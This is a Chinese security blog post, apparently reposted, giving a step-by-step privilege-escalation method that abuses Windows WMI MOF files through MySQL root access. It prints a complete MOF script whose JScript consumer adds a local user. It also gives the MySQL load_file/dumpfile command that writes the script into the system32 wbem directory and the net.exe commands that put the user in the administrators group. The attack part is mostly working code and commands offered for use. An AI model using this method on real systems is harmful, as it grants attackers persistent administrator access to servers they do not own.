MOF提权

admin
admin
admin
138674
文章
114
评论
2022年1月6日01:51:49评论100 views字数 1270阅读4分14秒阅读模式

0x00 原理

利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。

0x01 利用条件

具备Mysql的root权限

0x02 提权关键

导入nullevt.mof

0x03 提权步骤

1、生成 nullevt.mof文件,上传文件到可写目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 
#pragma namespace(“\\\\.\\root\\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\\Cimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa \”Win32_LocalTime\” “
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user quan 123 /add\”)“;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

2、执行导入命令
把我们的提权命令将 nullevt.mof 导入到c:/windows/system32/wbem/mof/目录

1
 
select load_file(“G:/test/nullevt.mof”) into dumpfile “c:/windows/system32/wbem/mof/nullevt.mof”

导入后,系统会自动运行该文件。
3、将提权脚本中添加用户命令修改为提升至administrators组:net.exe localgroup administrators quan /add,再次上传并导入

为了更高的成功率,我们必须分开两次导入该脚本。
第一次为添加用户,第二次对添加的用户进行提权。

添加用户

1
 
net.exe user quan 123 /add

对添加的用户进行提权

1
 
net.exe localgroup administrators quan /add

4、net user查看用户

0x04 参考

《网络攻防实战研究——漏洞利用与提权》
https://www.cnblogs.com/wh4am1/p/6613770.html

https://www.cnblogs.com/0nc3/p/12071337.html

FROM :b0urne.top | Author:b0urne

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:51:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MOF提权http://cn-sec.com/archives/722853.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息